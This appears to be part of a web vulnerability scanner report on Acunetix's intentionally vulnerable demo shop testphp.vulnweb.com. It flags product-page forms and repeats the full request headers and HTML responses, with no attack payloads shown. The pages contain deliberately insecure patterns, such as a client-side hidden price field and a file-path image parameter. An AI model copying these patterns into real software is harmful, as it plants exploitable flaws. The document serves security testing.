Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=5 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6382 |
Response Body - size: 6,382 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mean</h2><div class='story'><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $460</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='460'><input type='hidden' name='addcart' value='5'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=6 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name='f_addcart' method='POST' action='cart.php'> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=6 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6454 |
Response Body - size: 6,454 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Thing</h2><div class='story'><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 99 cm x 200 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $10000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='10000'><input type='hidden' name='addcart' value='6'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=6 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=6 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6454 |
Response Body - size: 6,454 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Thing</h2><div class='story'><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 99 cm x 200 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $10000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='10000'><input type='hidden' name='addcart' value='6'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=7 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name='f_addcart' method='POST' action='cart.php'> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=7 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5734 |
Response Body - size: 5,734 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Trees</h2><div class='story'><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>bla bla bla</p><h3>Long description</h3><p>bla bla bla long</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p>the price of this item is: $15000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='15000'><input type='hidden' name='addcart' value='7'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=7 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=7 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5734 |
Response Body - size: 5,734 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Trees</h2><div class='story'><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>bla bla bla</p><h3>Long description</h3><p>bla bla bla long</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p>the price of this item is: $15000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='15000'><input type='hidden' name='addcart' value='7'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/signup.php |
Method | GET |
Parameter | |
Attack | |
